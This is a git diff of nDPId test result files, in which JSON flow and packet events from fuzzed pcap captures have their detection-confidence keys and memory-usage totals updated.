00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -1423,16 +1423,16 @@ 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7580000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7580000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635044,"flow_last_seen":1120469635044,"flow_idle_time":7580000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":120,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635044,"flow_last_seen":1120469635044,"flow_idle_time":7580000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":120,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7580000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7580000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":691,"packets-processed":569,"total-skipped-flows":0,"total-l4-payload-len":60810,"total-not-detected-flows":35,"total-guessed-flows":28,"total-detected-flows":194,"total-detection-updates":88,"total-updates":31,"current-active-flows":0,"total-active-flows":257,"total-idle-flows":257,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1438,"global_ts_msec":1120471107427} @@ -1444,9 +1444,9 @@ ~~ total active/idle flows...: 257/257 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6188424 bytes -~~ total memory freed........: 6188424 bytes -~~ total allocations/frees...: 119744/119744 +~~ total memory allocated....: 6322058 bytes +~~ total memory freed........: 6322058 bytes +~~ total allocations/frees...: 122506/122506 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars ~~ json string max len.......: 1897 chars diff --git a/test/results/fuzz-2006-09-29-28586.pcap.out b/test/results/fuzz-2006-09-29-28586.pcap.out index f7d79cc7f..75275b960 100644 --- a/test/results/fuzz-2006-09-29-28586.pcap.out +++ b/test/results/fuzz-2006-09-29-28586.pcap.out @@ -12,7 +12,7 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} 02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -23,10 +23,10 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} 